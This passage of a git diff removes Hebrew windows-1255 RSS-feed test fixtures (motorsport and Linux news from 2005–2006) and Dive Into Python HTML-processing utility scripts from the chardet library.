מיקרוסופט - -http://www.pcplus.co.il/opinions.php?id=139 - - - - - - - diff --git a/chardet/tests/windows-1255-hebrew/sharks.co.il.xml b/chardet/tests/windows-1255-hebrew/sharks.co.il.xml deleted file mode 100644 index 0319c19..0000000 --- a/chardet/tests/windows-1255-hebrew/sharks.co.il.xml +++ /dev/null @@ -1,100 +0,0 @@ - - - - - -Sharks.co.il -http://www.sharks.co.il -חדשות חמות מהאתר -he-il -© Copyright 2005, Sharks.co.il. All Rights Reserved. -60 - - Sharks News - http://www.sharks.co.il/images/sharks_feed.gif - http://www.sharks.co.il/ - - - -פריס-דקאר 2006, יום- 5. -http://www.sharks.co.il/modules.php?name=News&file=article&sid=186 -Wed, 04 Jan 2006 18:35:43 +0200 -<div dir="rtl">חזרתו של הג'די ! כך הייתי מגדיר את היום הזה בדקאר, כאשר פטרהנסל שמנסה השנה להגן על התואר שלו, ניצל את נקודת ההתחלה הנמוכה שלו, לאחר שאיבד 18 דקות בגלל טעות ניווט אתמול, והשתמש בסימני המתחרים שיצאו לפניו כדי להגיע ראשון ולצמצם את הפער </div> - - - -פריס-דקאר 2006, יום- 4. -http://www.sharks.co.il/modules.php?name=News&file=article&sid=185 -Tue, 03 Jan 2006 18:07:09 +0200 -<div dir="rtl">אחרי שהמתחרים הרגישו קצת את החול בין האצבעות אתמול, בקטע המיוחד של היום הם כבר טבעו בדיונות. -הספיישל הכי ארוך עד היום היה תערובת מצויינת של דיונות, שבילי עפר מפותלים וקרקע סילעית, וכך לצד מהירויות גבוהות בקטעים מסויימת נדרשה מיומנות גבוהה מאוד באחרים.</div> - - - -פריס-דקאר 2006, יום- 3. -http://www.sharks.co.il/modules.php?name=News&file=article&sid=184 -Mon, 02 Jan 2006 18:47:33 +0200 -<div dir="rtl">היום השלישי של הפריס-דקאר עשה הפרדה בין הילדים למבוגרים, סיינז שהרשים עם נהיגה מצויינת בקטעים הדומים לסבב ה-WRC כבר לא ראשון. במקום זה חוזרים לככב שמות כמו פטרהנסל ואלופי השנים שעברו.</div> - - - -פריס-דקאר 2006, יום-2. -http://www.sharks.co.il/modules.php?name=News&file=article&sid=183 -Sun, 01 Jan 2006 18:51:14 +0200 -<div dir="rtl">עוד יום עבר בפריס דקאר, הקטע של היום היה סה"כ 567 ק"מ, מתוכם 115 ק"מ ספיישל. -הקטע שהוא השני והאחרון באירופה נתן למתחרים רגעים אחרונים של נחת לפני תחילת הקרב האמיתי. -המנצח כמו אתמול היה הספרדי קרלוס סיינז, תתחילו להתרגל להגיד - אל מטדור !</div> - - - -פריס-דקאר 2006, יום-I. -http://www.sharks.co.il/modules.php?name=News&file=article&sid=182 -Sat, 31 Dec 2005 17:45:26 +0200 -<div dir="rtl">נראה כאילו רק אתמול כתבתי על הראלי הקשה בעולם והנה שוב הוא הגיע !. -כבכול יום אשתדל לעדכן אותכם באירועי היום, הקטעים ובחדשות. -אז נתחיל.</div> - - - -חוק הספורט המוטורי בישראל -http://www.sharks.co.il/modules.php?name=News&file=article&sid=181 -Tue, 27 Dec 2005 10:43:21 +0200 -<div dir="rtl">חוק הספורט המוטורי התקבל בכנסת בקריאה שניה ושלישית, יש! מאמר קצר הסוקר את החוק החדש מאת ראם סמואל.</div> - - - -עשרת הדיברות לנהיגת חורף -http://www.sharks.co.il/modules.php?name=News&file=article&sid=180 -Tue, 01 Nov 2005 01:08:28 +0200 -<div dir="rtl">עשרת הדיברות לנהיגת חורף מאת ראם סמואל, מנכ"ל "מסלולים" הינו מאמר חובה לפני שאתם עולים עם רכבכם לכבישים הרטובים של מדינת ישראל.</div> - - - -פרוייקט ראש מנוע - חלק ב' -http://www.sharks.co.il/modules.php?name=News&file=article&sid=179 -Fri, 21 Oct 2005 18:39:03 +0200 -<div dir="rtl">אז איפה היינו? -כן, הראש נשלח לשיפוץ, גם השסתומים ושאר החלקים שניזוקו בתהליך. -עכשיו נשאר שהכל יחזור כמושצריך, להרכיב הכל מחדש ולהתפלל. -איך נגמר הפרוייקט? הכל מחכה לכם בחלק הזה.</div> - - - -אאודי S8 חדשה -http://www.sharks.co.il/modules.php?name=News&file=article&sid=178 -Wed, 19 Oct 2005 13:45:56 +0200 -<div dir="rtl">כשאאודי קנו את למבורגיני, הם ידעו מה הם עושים. מנוע ה-V10 של החברה האטלקית (במקור) הפך לאאודי, והושתל ב-A8, מה שיוצר דגם חדש למכונית מדהימה, ה-S8.</div> - - - -595 כ"ס? איזה שיעמום... -http://www.sharks.co.il/modules.php?name=News&file=article&sid=177 -Tue, 18 Oct 2005 19:22:12 +0200 -<div dir="rtl">סטיישן, ארבע על ארבע, מנוע V8 וכמעט 600 כוחות סוס. קלימאן לא עוצרים לרגע, פשוט לא נמאס להם. למען האמת, גם לנו לא נמאס. תכירו - זוהי הקלימאן 50KCC.</div> - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1255-hebrew/whatsup.org.il.xml b/chardet/tests/windows-1255-hebrew/whatsup.org.il.xml deleted file mode 100644 index 5dab463..0000000 --- a/chardet/tests/windows-1255-hebrew/whatsup.org.il.xml +++ /dev/null @@ -1,146 +0,0 @@ - - - - - - - -Whatsup - לינוקס, תוכנה חופשית וקוד פתוח בעברית -http://www.whatsup.co.il/ -Whatsup - פורטל הלינוקס העברי שלך - בעברית ! -he-il - - Whatsup - לינוקס, תוכנה חופשית וקוד פתוח בעברית - http://www.whatsup.co.il/images/ - http://www.whatsup.co.il/ - -admin@whatsup.org.il - -הטמעת פייתון ביישומי C/C++ -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4982 - -פעמים רבות, כאשר כותבים יישומים גדולים (במיוחד בסביבת *nix) שפות היישום הן C ו-C++. לאחר שהיישום נבנה, הוא די סטטי. פעמים רבות נדרשות יכולות הרחבה מצד משתמשי קצה/צד שלישי, כגון: כתיבת תוספים ע"י המשתמשים, הפעלה קוד מותאם עבור הלקוח באתר (בין אם נכתב ע"י הלקוח או התמיכה) עם התרחשות אירועים שונים וכדו'.<br /> -<br /> -אם ניקח לדוגמא את מקרה פיירפוקס, תחום התוספים עבורו פורח גם הודות לקלות היחסית של יצירתם (<a href="http://xulplanet.com">XUL עם ג'אווהסקריפט</a>). יצירת תוספים בשפות C/C++ יכולה להוות בעיה. על המשתמש להכיר את שפת הפיתוח (די מורכבת, במיוחד למשתמשים מהשורה), להתגבר על בעיות linking ושאר ירקות. מצד שני, בניית שפת תסריטים משלך אינו דבר פשוט ומועד לשגיאות. - - -אופן-אופיס בדרכים -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4981 - -בהמשך למגמת יישומי חלונות הניתנים להפעלה מדיסק usb או התקנים שליפים אחרים (כגון: <a href="article/3786">Firefox</a> ו-<a href="article/3853">Thunderbird</a>) הוכרז <a href="http://portableapps.com/news/2006-01-03_-_portable_openoffice_2.0.1_released">עדכון ל-Portable OpenOffice.org</a>.<br /> -<br /> -העדכון כולל:<br /> -<br /> -- גרסה 2.0.1<br /> -- תמיכה מלאה ב-windows 2000<br /> -- תמיכה להגדרות תחת windows 98 ו-ME<br /> -- משגרים ליישומים הנפרדים (כגון writer, calc, impress וכו') - - -שוחרר קרנל 2.6.15 -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4980 - -יצאה גירסאת הקרנל הבאה 2.6.15, בדיוק 15 שנה לאחר הפעם הראשונה שלינוס הביא את המכונה שהריצה לינוקס ממש. <br /> - <a href="http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15">רשימת השינויים</a> כרגיל ארוכה וכוללת בעיקר תיקוני באגים ועידכון דרייברים.<br /> -<br /> -קישורים נוספים:<br /> -<br /> -ווטסאפ, <a href="http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4854">ויקי כתחליף ל-changelog</a>, הערה, האתר לא עובד כעת. כנראה בגלל עומס. - - -hocr 0.7.0 שוחרר -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4979 - -שוחררה גרסה 0.7.0 של hocr.<br /> -<br /> -hocr היא ספרית C/C++ לצורך זיהוי אותיות אופטי עברי. זו הגירסה הראשונה המשוחררת מאד הודיע איגוד האינטרנט הישראלי על רצונו להעניק סיוע לפרוייקט. תכונות המערכת:<br /> -<br /> -1. קריאת טקסטים סרוקים בעברית<br /> -2. קריאה והבנת ניקוד<br /> -3. קישורים לשפות C++ פיטון ופרל<br /> -4. מתמשקת בקלות עם מבנה התמונה המשמשים ב QT ו GTK<br /> -5. מנשקים ל GTK , QT ולשורת הפקודה.<br /> -<br /> -רשימת השינויים כוללת:<br /> -<br /> -- קישור לשפות C++ פייטון ופרל<br /> -- שיפורים במנשק הגרפי של GTK<br /> -- מדריכים בעברית<br /> -<br /> -<b>קישורים</b>:<br /> -<br /> -<a href="http://hocr.berlios.de/screenshots.html">תמונות מסך</a>,<br /> -<a href="http://hocr.berlios.de/index.html">דף הבית של הפרוייקט</a>,<br /> -<a href="http://hocr.berlios.de/wiki/doku.php">מדריכים בעברית</a>, - - -מה עשית בשנת 2005 עבור הקוד הפתוח? -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4978 - -הקוד הפתוח בישראל נשען כמעט אך ורק על מתנדבים, ובזה כוחנו כקהילה. אם הרגשת שבשנה היוצאת לא עשית מספיק עבור הקוד הפתוח בישראל, תוכל/י לתקן זאת ב- 2006.<br /> -<br /> -להלן רשימה של פרויקטים שצריכים את עזרתך, היום ועכשיו. רובם לא מצריכים יכולת תכנות או השקעת זמן יוצאת דופן – כלומר הם יכולים להיעשות על ידך.<br /> -<br /> - - - -פתיחת העונה בתלוקס: הרצאה על vim ב-8 בינואר -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4977 - -<p> -<a href="http://www.cs.tau.ac.il/telux/">מועדון הלינוקס התל-אביבי (תלוקס)</a> -פותח את עונת ההרצאות הרגילות עם הרצאה של שגיב ברהום על -<a href="http://www.vim.org/">עורך הטקסט Vim</a>. -ההרצאה תערך ביום ראשון, 8 בינואר 2006, בשעה 18:30, בחדר 008 בבניין שרייבר באוניברסיטת תל-אביב. פרטים נוספים ניתן למצוא -<a href="http://www.cs.tau.ac.il/telux/">באתר</a>. -</p> - - - -OpenOffice 2.0 בעברית -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4976 - -לאחר המתנה ארוכה, תשוחרר עם תחילת השנה האזרחית החדשה, גירסת אופן אופיס 2 בעיברית. הגירסה הבאה אשר תבוסס על מהדורה 2.02 אשר בה תיקוני בגים, תשוחרר לקראת חודש מרץ.<br /> -<br /> -פרטים נוספים לגבי מועדי השיחרור ניתן למצוא באתרי אופן אופיס:<br /> -<a href="http://www.openoffice.org.il/">אתר אופן אופיס הישראלי</a><br /> -<a href="http://www.openoffice.org/">אתר אופן אופיס הראשי</a><br /> - - - -וואלה! מתרחבת עם "וואלה! פדיה" -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4975 - -אתר האינטרנט "וואלה!" פותח היום את "וואלה! פדיה" - אתר שמהווה שיתוף פעולה עם אתר "ויקיפדיה" הישראלי.<br /> -וואלה! יציגו ערכים רלוונטים מתוך "וואלה! פדיה" בתוך תוצאות החיפוש וכן יאפשרו לגולשים לקרוא תוכן מאתר "ויקיפדיה" בתוך שער הכניסה שלהם.<br /> -במסגרת השיתוף פעולה, "וואלה!" יעבירו חלק מנתחי ההכנסות שלהם לויקיפדיה וכן יתרמו תוכן לאתר.<br /> -<br /> -באמצעות אתר זה, מקווים ב"וואלה!" להתחרות בשרות האינצקלופדיה של אתר Ynet ובאתר גוגל שלאחרונה פתח סניף בישראל.<br /> -<br /> -מקור: <a href="http://www.haaretz.co.il/captain/pages/ShArtCaptain.jhtml?contrassID=11&subContrassID=0&itemNo=663887">וואלה מצטרפת לויקיפדיה בוואלה פדיה</a>, הארץ.<br /> -לאתר <a href="http://pedia.walla.co.il/">וואלה-פדיה</a> - - -הזיקית בישראל -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4974 - -<a href="http://www.chameleon.org.il/index.html">Chameleon</a> (זיקית) הוא האתר המרכז את הפעילות הקהילתית של נובל וסוזה לינוקס בישראל.<br /> -<br /> -תוכלו למצוא שם מדריכים, פורום תמיכה וחנות מוצרים. עוד באתר קישורים להורדות, קורסים, מצב וניתוח פיננסי של נובל.<br /> -<br /> -מפריע מעט השימוש ביישומוני ג'אווה שהופך חלקים מהאתר לא נגישים (לאלה שאין להם את התוסף) או גורמים לאיטיות ועומס של 100% על המעבד (לפחות אצלי על dapper ופיירפוקס 1.5) במעבר לחלק מהעמודים. - - -חברת DELL החלה לצרף את פיירפוקס לצד האקספלורר בבריטניה ואוסטרליה -http://www.whatsup.co.il/modules.php?op=modload&name=News&file=article&sid=4973 - -NRG מדווחים כי <a href="http://www.nrg.co.il/online/10/ART1/026/334.html">דל החלה להתקין בצורה שקטה את פיירפוקס</a> במקביל ל-ל-IE (אשר נשאר דפדפן ברירת המחדל):<br /> -<br /> -"...הפצת פיירפוקס במחשבי החברה לא לוותה בהודעה רשמית. לקוחות החברה הופתעו לגלות את האייקון של פיירפוקס על שולחן העבודה של מחשביהם החדשים, בסמוך לזה של אקספלורר. בלייק רוס, איש קרן מוזילה ואחד מיוצרי פיירפוקס, היה הראשון לאשר את הידיעה בבלוגו. בהמשך הודיעו גורמים ב-DELL שהחבילה המכילה את פיירפוקס תופץ כרגע רק בבריטניה, ולאחר מכן באוסטרליה. לדברי אנשי החברה, אין הכוונה להרחיב את הפצת החבילה לאזורים אחרים בעולם..." - - - diff --git a/chardet/util/BaseHTMLProcessor.py b/chardet/util/BaseHTMLProcessor.py deleted file mode 100644 index c3f2168..0000000 --- a/chardet/util/BaseHTMLProcessor.py +++ /dev/null @@ -1,93 +0,0 @@ -"""Base class for creating HTML processing modules - -This class is designed to take HTML as input and spit out equivalent -HTML as output. By itself it's not very interesting; you use it by -subclassing it and providing the methods you need to create your HTML -transformation. - -This program is part of "Dive Into Python", a free Python book for -experienced programmers. Visit http://diveintopython.org/ for the -latest version. -""" - -__author__ = "Mark Pilgrim (mark@diveintopython.org)" -__version__ = "$Revision: 1.1 $" -__date__ = "$Date: 2005/12/25 03:22:56 $" -__copyright__ = "Copyright (c) 2001 Mark Pilgrim" -__license__ = "Python" - -from sgmllib import SGMLParser -import htmlentitydefs - -class BaseHTMLProcessor(SGMLParser): - def reset(self): - # extend (called by SGMLParser.__init__) - self.pieces = [] - SGMLParser.reset(self) - - def unknown_starttag(self, tag, attrs): - # called for each start tag - # attrs is a list of (attr, value) tuples - # e.g. for
    , tag="pre", attrs=[("class", "screen")]
    -		# Ideally we would like to reconstruct original tag and attributes, but
    -		# we may end up quoting attribute values that weren't quoted in the source
    -		# document, or we may change the type of quotes around the attribute value
    -		# (single to double quotes).
    -		# Note that improperly embedded non-HTML code (like client-side Javascript)
    -		# may be parsed incorrectly by the ancestor, causing runtime script errors.
    -		# All non-HTML code must be enclosed in HTML comment tags ()
    -		# to ensure that it will pass through this parser unaltered (in handle_comment).
    -		strattrs = "".join([' %s="%s"' % (key, value) for key, value in attrs])
    -		self.pieces.append("<%(tag)s%(strattrs)s>" % locals())
    -		
    -	def unknown_endtag(self, tag):
    -		# called for each end tag, e.g. for 
    , tag will be "pre" - # Reconstruct the original end tag. - self.pieces.append("" % locals()) - - def handle_charref(self, ref): - # called for each character reference, e.g. for " ", ref will be "160" - # Reconstruct the original character reference. - self.pieces.append("&#%(ref)s;" % locals()) - - def handle_entityref(self, ref): - # called for each entity reference, e.g. for "©", ref will be "copy" - # Reconstruct the original entity reference. - self.pieces.append("&%(ref)s" % locals()) - # standard HTML entities are closed with a semicolon; other entities are not - if htmlentitydefs.entitydefs.has_key(ref): - self.pieces.append(";") - - def handle_data(self, text): - # called for each block of plain text, i.e. outside of any tag and - # not containing any character or entity references - # Store the original text verbatim. - self.pieces.append(text) - - def handle_comment(self, text): - # called for each HTML comment, e.g. - # Reconstruct the original comment. - # It is especially important that the source document enclose client-side - # code (like Javascript) within comments so it can pass through this - # processor undisturbed; see comments in unknown_starttag for details. - self.pieces.append("" % locals()) - - def handle_pi(self, text): - # called for each processing instruction, e.g. - # Reconstruct original processing instruction. - self.pieces.append("" % locals()) - - def handle_decl(self, text): - # called for the DOCTYPE, if present, e.g. - # - # Reconstruct original DOCTYPE - self.pieces.append("" % locals()) - - def output(self): - """Return processed HTML as a single string""" - return "".join(self.pieces) - -if __name__ == "__main__": - for k, v in globals().items(): - print k, "=", v diff --git a/chardet/util/BaseHTMLProcessor.pyc b/chardet/util/BaseHTMLProcessor.pyc deleted file mode 100644 index 9e34a3b..0000000 Binary files a/chardet/util/BaseHTMLProcessor.pyc and /dev/null differ diff --git a/chardet/util/colorize.py b/chardet/util/colorize.py deleted file mode 100644 index ebaa12a..0000000 --- a/chardet/util/colorize.py +++ /dev/null @@ -1,142 +0,0 @@ -""" -Colorize Python program listings embedded in HTML pages - -This script is used during the build process of "Dive Into Python" -(http://diveintopython.org/) to recreate syntax highlighting of the Python -program listings and code examples embedded in the HTML pages by wrapping -Python keywords in or tags. The following -tags are presumed to contain Python code: -
    ...
    - ... -(These tags are generated automatically by the DocBook XSL stylesheets when -the book is transformed from XML to HTML.) - -Looks for 2 arguments on the command line. The first argument is a file or directory. -If a file, the file is processed; if a directory, all .html files in the directory -are processed. - -The second argument, if given, is a flag for the type of tags to wrap around -keywords. - 0 (default) - use tags, where xxx in - ('comment', 'string', 'keyword', 'function', 'class'). Actual - syntax highlighting must be defined in a